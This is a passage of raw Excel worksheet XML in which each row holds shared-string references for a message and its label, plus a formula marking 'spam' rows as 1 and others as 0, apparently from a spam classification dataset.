        <v>5294</v>
      </c>
      <c r="C712" s="1">
        <f>IF(B712="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="713" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A713" t="s">
        <v>5995</v>
      </c>
      <c r="B713" t="s">
        <v>5294</v>
      </c>
      <c r="C713" s="1">
        <f>IF(B713="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="714" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A714" t="s">
        <v>5996</v>
      </c>
      <c r="B714" t="s">
        <v>5297</v>
      </c>
      <c r="C714" s="1">
        <f>IF(B714="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="715" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A715" t="s">
        <v>5997</v>
      </c>
      <c r="B715" t="s">
        <v>5294</v>
      </c>
      <c r="C715" s="1">
        <f>IF(B715="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="716" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A716" t="s">
        <v>5998</v>
      </c>
      <c r="B716" t="s">
        <v>5294</v>
      </c>
      <c r="C716" s="1">
        <f>IF(B716="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="717" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A717" t="s">
        <v>5999</v>
      </c>
      <c r="B717" t="s">
        <v>5294</v>
      </c>
      <c r="C717" s="1">
        <f>IF(B717="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="718" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A718" t="s">
        <v>6000</v>
      </c>
      <c r="B718" t="s">
        <v>5297</v>
      </c>
      <c r="C718" s="1">
        <f>IF(B718="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="719" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A719" t="s">
        <v>6001</v>
      </c>
      <c r="B719" t="s">
        <v>5294</v>
      </c>
      <c r="C719" s="1">
        <f>IF(B719="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="720" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A720" t="s">
        <v>6002</v>
      </c>
      <c r="B720" t="s">
        <v>5297</v>
      </c>
      <c r="C720" s="1">
        <f>IF(B720="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="721" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A721" t="s">
        <v>6003</v>
      </c>
      <c r="B721" t="s">
        <v>5294</v>
      </c>
      <c r="C721" s="1">
        <f>IF(B721="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="722" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A722" t="s">
        <v>6004</v>
      </c>
      <c r="B722" t="s">
        <v>5294</v>
      </c>
      <c r="C722" s="1">
        <f>IF(B722="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A723" t="s">
        <v>6005</v>
      </c>
      <c r="B723" t="s">
        <v>5294</v>
      </c>
      <c r="C723" s="1">
        <f>IF(B723="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A724" t="s">
        <v>6006</v>
      </c>
      <c r="B724" t="s">
        <v>5294</v>
      </c>
      <c r="C724" s="1">
        <f>IF(B724="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A725" t="s">
        <v>6007</v>
      </c>
      <c r="B725" t="s">
        <v>5294</v>
      </c>
      <c r="C725" s="1">
        <f>IF(B725="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A726" t="s">
        <v>6008</v>
      </c>
      <c r="B726" t="s">
        <v>5294</v>
      </c>
      <c r="C726" s="1">
        <f>IF(B726="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A727" t="s">
        <v>6009</v>
      </c>
      <c r="B727" t="s">
        <v>5294</v>
      </c>
      <c r="C727" s="1">
        <f>IF(B727="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A728" t="s">
        <v>6010</v>
      </c>
      <c r="B728" t="s">
        <v>5294</v>
      </c>
      <c r="C728" s="1">
        <f>IF(B728="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A729" t="s">
        <v>6011</v>
      </c>
      <c r="B729" t="s">
        <v>5294</v>
      </c>
      <c r="C729" s="1">
        <f>IF(B729="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A730" t="s">
        <v>6012</v>
      </c>
      <c r="B730" t="s">
        <v>5294</v>
      </c>
      <c r="C730" s="1">
        <f>IF(B730="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A731" t="s">
        <v>6013</v>
      </c>
      <c r="B731" t="s">
        <v>5294</v>
      </c>
      <c r="C731" s="1">
        <f>IF(B731="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A732" t="s">
        <v>6014</v>
      </c>
      <c r="B732" t="s">
        <v>5297</v>
      </c>
      <c r="C732" s="1">
        <f>IF(B732="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A733" t="s">
        <v>6015</v>
      </c>
      <c r="B733" t="s">
        <v>5294</v>
      </c>
      <c r="C733" s="1">
        <f>IF(B733="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A734" t="s">
        <v>6016</v>
      </c>
      <c r="B734" t="s">
        <v>5294</v>
      </c>
      <c r="C734" s="1">
        <f>IF(B734="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A735" t="s">
        <v>6017</v>
      </c>
      <c r="B735" t="s">
        <v>5294</v>
      </c>
      <c r="C735" s="1">
        <f>IF(B735="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A736" t="s">
        <v>6018</v>
      </c>
      <c r="B736" t="s">
        <v>5294</v>
      </c>
      <c r="C736" s="1">
        <f>IF(B736="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A737" t="s">
        <v>6019</v>
      </c>
      <c r="B737" t="s">
        <v>5294</v>
      </c>
      <c r="C737" s="1">
        <f>IF(B737="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A738" t="s">
        <v>6020</v>
      </c>
      <c r="B738" t="s">
        <v>5294</v>
      </c>
      <c r="C738" s="1">
        <f>IF(B738="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A739" t="s">
        <v>6021</v>
      </c>
      <c r="B739" t="s">
        <v>5297</v>
      </c>
      <c r="C739" s="1">
        <f>IF(B739="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A740" t="s">
        <v>6022</v>
      </c>
      <c r="B740" t="s">
        <v>5294</v>
      </c>
      <c r="C740" s="1">
        <f>IF(B740="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A741" t="s">
        <v>6023</v>
      </c>
      <c r="B741" t="s">
        <v>5294</v>
      </c>
      <c r="C741" s="1">
        <f>IF(B741="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A742" t="s">
        <v>6024</v>
      </c>
      <c r="B742" t="s">
        <v>5294</v>
      </c>
      <c r="C742" s="1">
        <f>IF(B742="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A743" t="s">
        <v>6025</v>
      </c>
      <c r="B743" t="s">
        <v>5294</v>
      </c>
      <c r="C743" s="1">
        <f>IF(B743="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A744" t="s">
        <v>6026</v>
      </c>
      <c r="B744" t="s">
        <v>5294</v>
      </c>
      <c r="C744" s="1">
        <f>IF(B744="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A745" t="s">
        <v>6027</v>
      </c>
      <c r="B745" t="s">
        <v>5294</v>
      </c>
      <c r="C745" s="1">
        <f>IF(B745="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A746" t="s">
        <v>6028</v>
      </c>
      <c r="B746" t="s">
        <v>5294</v>
      </c>
      <c r="C746" s="1">
        <f>IF(B746="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A747" t="s">
        <v>6029</v>
      </c>
      <c r="B747" t="s">
        <v>5294</v>
      </c>
      <c r="C747" s="1">
        <f>IF(B747="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A748" t="s">
        <v>6030</v>
      </c>
      <c r="B748" t="s">
        <v>5294</v>
      </c>
      <c r="C748" s="1">
        <f>IF(B748="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A749" t="s">
        <v>6031</v>
      </c>
      <c r="B749" t="s">
        <v>5297</v>
      </c>
      <c r="C749" s="1">
        <f>IF(B749="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A750" t="s">
        <v>6032</v>
      </c>
      <c r="B750" t="s">
        <v>5294</v>
      </c>
      <c r="C750" s="1">
        <f>IF(B750="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A751" t="s">
        <v>6033</v>
      </c>
      <c r="B751" t="s">
        <v>5294</v>
      </c>
      <c r="C751" s="1">
        <f>IF(B751="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A752" t="s">
        <v>6034</v>
      </c>
      <c r="B752" t="s">
        <v>5297</v>
      </c>
      <c r="C752" s="1">
        <f>IF(B752="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A753" t="s">
        <v>6035</v>
      </c>
      <c r="B753" t="s">
        <v>5297</v>
      </c>
      <c r="C753" s="1">
        <f>IF(B753="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A754" t="s">
        <v>6036</v>
      </c>
      <c r="B754" t="s">
        <v>5294</v>
      </c>
      <c r="C754" s="1">
        <f>IF(B754="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A755" t="s">
        <v>6037</v>
      </c>
      <c r="B755" t="s">
        <v>5294</v>
      </c>
      <c r="C755" s="1">
        <f>IF(B755="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A756" t="s">
        <v>6038</v>
      </c>
      <c r="B756" t="s">
        <v>5294</v>
      </c>
      <c r="C756" s="1">
        <f>IF(B756="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A757" t="s">
        <v>6039</v>
      </c>
      <c r="B757" t="s">
        <v>5294</v>
      </c>
      <c r="C757" s="1">
        <f>IF(B757="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A758" t="s">
        <v>6040</v>
      </c>
      <c r="B758" t="s">
        <v>5294</v>
      </c>
      <c r="C758" s="1">
        <f>IF(B758="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A759" t="s">
        <v>6041</v>
      </c>
      <c r="B759" t="s">
        <v>5294</v>
      </c>
      <c r="C759" s="1">
        <f>IF(B759="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A760" t="s">
        <v>6042</v>
      </c>
      <c r="B760" t="s">
        <v>5294</v>
      </c>
      <c r="C760" s="1">
        <f>IF(B760="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A761" t="s">
        <v>6043</v>
      </c>
      <c r="B761" t="s">
        <v>5294</v>
      </c>
      <c r="C761" s="1">
        <f>IF(B761="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A762" t="s">
        <v>6044</v>
      </c>
      <c r="B762" t="s">
        <v>5297</v>
      </c>
      <c r="C762" s="1">
        <f>IF(B762="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A763" t="s">
        <v>6045</v>
      </c>
      <c r="B763" t="s">
        <v>5294</v>
      </c>
      <c r="C763" s="1">
        <f>IF(B763="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A764" t="s">
        <v>6046</v>
      </c>
      <c r="B764" t="s">
        <v>5297</v>
      </c>
      <c r="C764" s="1">
        <f>IF(B764="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A765" t="s">
        <v>6047</v>
      </c>
      <c r="B765" t="s">
        <v>5294</v>
      </c>
      <c r="C765" s="1">
        <f>IF(B765="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A766" t="s">
        <v>6048</v>
      </c>
      <c r="B766" t="s">
        <v>5294</v>
      </c>
      <c r="C766" s="1">
        <f>IF(B766="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A767" t="s">
        <v>6049</v>
      </c>
      <c r="B767" t="s">
        <v>5297</v>
      </c>
      <c r="C767" s="1">
        <f>IF(B767="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A768" t="s">
        <v>6050</v>
      </c>
      <c r="B768" t="s">
        <v>5294</v>
      </c>
      <c r="C768" s="1">
        <f>IF(B768="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A769" t="s">
        <v>5376</v>
      </c>
      <c r="B769" t="s">
        <v>5294</v>
      </c>
      <c r="C769" s="1">
        <f>IF(B769="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A770" t="s">
        <v>5590</v>
      </c>
      <c r="B770" t="s">
        <v>5294</v>
      </c>
      <c r="C770" s="1">
        <f>IF(B770="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A771" t="s">
        <v>6051</v>
      </c>
      <c r="B771" t="s">
        <v>5294</v>
      </c>
      <c r="C771" s="1">
        <f>IF(B771="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A772" t="s">
        <v>6052</v>
      </c>
      <c r="B772" t="s">
        <v>5294</v>
      </c>
      <c r="C772" s="1">
        <f>IF(B772="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A773" t="s">
        <v>6053</v>
      </c>
      <c r="B773" t="s">
        <v>5294</v>
      </c>
      <c r="C773" s="1">
        <f>IF(B773="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A774" t="s">
        <v>6054</v>
      </c>
      <c r="B774" t="s">
        <v>5294</v>
      </c>
      <c r="C774" s="1">
        <f>IF(B774="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A775" t="s">
        <v>6055</v>
      </c>
      <c r="B775" t="s">
        <v>5294</v>
      </c>
      <c r="C775" s="1">
        <f>IF(B775="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A776" t="s">
        <v>5628</v>
      </c>
      <c r="B776" t="s">
        <v>5294</v>
      </c>
      <c r="C776" s="1">
        <f>IF(B776="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A777" t="s">
        <v>6056</v>
      </c>
      <c r="B777" t="s">
        <v>5294</v>
      </c>
      <c r="C777" s="1">
        <f>IF(B777="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A778" t="s">
        <v>6057</v>
      </c>
      <c r="B778" t="s">
        <v>5294</v>
      </c>
      <c r="C778" s="1">
        <f>IF(B778="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A779" t="s">
        <v>6058</v>
      </c>
      <c r="B779" t="s">
        <v>5294</v>
      </c>
      <c r="C779" s="1">
        <f>IF(B779="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A780" t="s">
        <v>6059</v>
      </c>
      <c r="B780" t="s">
        <v>5294</v>
      </c>
      <c r="C780" s="1">
        <f>IF(B780="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A781" t="s">
        <v>6060</v>
      </c>
      <c r="B781" t="s">
        <v>5294</v>
      </c>
      <c r="C781" s="1">
        <f>IF(B781="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A782" t="s">
        <v>5797</v>
      </c>
      <c r="B782" t="s">
        <v>5294</v>
      </c>
      <c r="C782" s="1">
        <f>IF(B782="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A783" t="s">
        <v>6061</v>
      </c>
      <c r="B783" t="s">
        <v>5294</v>
      </c>
      <c r="C783" s="1">
        <f>IF(B783="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A784" t="s">
        <v>6062</v>
      </c>
      <c r="B784" t="s">
        <v>5294</v>
      </c>
      <c r="C784" s="1">
        <f>IF(B784="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A785" t="s">
        <v>6063</v>
      </c>
      <c r="B785" t="s">
        <v>5297</v>
      </c>
      <c r="C785" s="1">
        <f>IF(B785="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A786" t="s">
        <v>6064</v>
      </c>
      <c r="B786" t="s">
        <v>5294</v>
      </c>
      <c r="C786" s="1">
        <f>IF(B786="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A787" t="s">
        <v>6065</v>
      </c>
      <c r="B787" t="s">
        <v>5294</v>
      </c>
      <c r="C787" s="1">
        <f>IF(B787="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A788" t="s">
        <v>6066</v>
      </c>
      <c r="B788" t="s">
        <v>5294</v>
      </c>
      <c r="C788" s="1">
        <f>IF(B788="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A789" t="s">
        <v>6067</v>
      </c>
      <c r="B789" t="s">
        <v>5297</v>
      </c>
      <c r="C789" s="1">
        <f>IF(B789="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A790" t="s">
        <v>6068</v>
      </c>
      <c r="B790" t="s">
        <v>5297</v>
      </c>
      <c r="C790" s="1">
        <f>IF(B790="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A791" t="s">
        <v>5489</v>
      </c>
      <c r="B791" t="s">
        <v>5294</v>
      </c>
      <c r="C791" s="1">
        <f>IF(B791="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A792" t="s">
        <v>6069</v>
      </c>
      <c r="B792" t="s">
        <v>5294</v>
      </c>
      <c r="C792" s="1">
        <f>IF(B792="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A793" t="s">
        <v>6070</v>
      </c>
      <c r="B793" t="s">
        <v>5294</v>
      </c>
      <c r="C793" s="1">
        <f>IF(B793="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A794" t="s">
        <v>6071</v>
      </c>
      <c r="B794" t="s">
        <v>5294</v>
      </c>
      <c r="C794" s="1">
        <f>IF(B794="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A795" t="s">
        <v>6072</v>
      </c>
      <c r="B795" t="s">
        <v>5294</v>
      </c>
      <c r="C795" s="1">
        <f>IF(B795="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A796" t="s">
        <v>6073</v>
      </c>
      <c r="B796" t="s">
        <v>5294</v>
      </c>
      <c r="C796" s="1">
        <f>IF(B796="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A797" t="s">
        <v>6074</v>
      </c>
      <c r="B797" t="s">
        <v>5294</v>
      </c>
      <c r="C797" s="1">
        <f>IF(B797="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A798" t="s">
        <v>6075</v>
      </c>
      <c r="B798" t="s">
        <v>5297</v>
      </c>
      <c r="C798" s="1">
        <f>IF(B798="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A799" t="s">
        <v>6076</v>
      </c>
      <c r="B799" t="s">
        <v>5294</v>
      </c>
      <c r="C799" s="1">
        <f>IF(B799="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A800" t="s">
        <v>6077</v>
      </c>
      <c r="B800" t="s">
        <v>5294</v>
      </c>
      <c r="C800" s="1">
        <f>IF(B800="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A801" t="s">
        <v>6078</v>
      </c>
      <c r="B801" t="s">
        <v>5294</v>
      </c>
      <c r="C801" s="1">
        <f>IF(B801="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A802" t="s">
        <v>6079</v>
      </c>
      <c r="B802" t="s">
        <v>5297</v>
      </c>
      <c r="C802" s="1">
        <f>IF(B802="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A803" t="s">
        <v>6080</v>
      </c>
      <c r="B803" t="s">
        <v>5294</v>
      </c>
      <c r="C803" s="1">
        <f>IF(B803="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A804" t="s">
        <v>6081</v>
      </c>
      <c r="B804" t="s">
        <v>5297</v>
      </c>
      <c r="C804" s="1">
        <f>IF(B804="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A805" t="s">
        <v>6082</v>
      </c>
      <c r="B805" t="s">
        <v>5297</v>
      </c>
      <c r="C805" s="1">
        <f>IF(B805="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A806" t="s">
        <v>6083</v>
      </c>
      <c r="B806" t="s">
        <v>5294</v>
      </c>
      <c r="C806" s="1">
        <f>IF(B806="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A807" t="s">
        <v>6084</v>
      </c>
      <c r="B807" t="s">
        <v>5294</v>
      </c>
      <c r="C807" s="1">
        <f>IF(B807="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A808" t="s">
        <v>6085</v>
      </c>
      <c r="B808" t="s">
        <v>5294</v>
      </c>
      <c r="C808" s="1">
        <f>IF(B808="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A809" t="s">
        <v>6086</v>
      </c>
      <c r="B809" t="s">
        <v>5294</v>
      </c>
      <c r="C809" s="1">
        <f>IF(B809="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A810" t="s">
        <v>6087</v>
      </c>
      <c r="B810" t="s">
        <v>5294</v>
      </c>
      <c r="C810" s="1">
        <f>IF(B810="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A811" t="s">
        <v>6088</v>
      </c>
      <c r="B811" t="s">
        <v>5294</v>
      </c>
      <c r="C811" s="1">
        <f>IF(B811="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A812" t="s">
        <v>6089</v>
      </c>
      <c r="B812" t="s">
        <v>5294</v>
      </c>
      <c r="C812" s="1">
        <f>IF(B812="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A813" t="s">
        <v>6090</v>
      </c>
      <c r="B813" t="s">
        <v>5294</v>
      </c>
      <c r="C813" s="1">
        <f>IF(B813="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A814" t="s">
        <v>6091</v>
      </c>
      <c r="B814" t="s">
        <v>5297</v>
      </c>
      <c r="C814" s="1">
        <f>IF(B814="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A815" t="s">
        <v>6092</v>
      </c>
      <c r="B815" t="s">
        <v>5294</v>
      </c>
      <c r="C815" s="1">
        <f>IF(B815="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A816" t="s">
        <v>6093</v>
      </c>
      <c r="B816" t="s">
        <v>5297</v>
      </c>
      <c r="C816" s="1">
        <f>IF(B816="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A817" t="s">
        <v>6094</v>
      </c>
      <c r="B817" t="s">
        <v>5294</v>
      </c>
      <c r="C817" s="1">
        <f>IF(B817="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A818" t="s">
        <v>6095</v>
      </c>
      <c r="B818" t="s">
        <v>5294</v>
      </c>
      <c r="C818" s="1">
        <f>IF(B818="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A819" t="s">
        <v>6096</v>
      </c>
      <c r="B819" t="s">
        <v>5294</v>
      </c>
      <c r="C819" s="1">
        <f>IF(B819="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A820" t="s">
        <v>6097</v>
      </c>
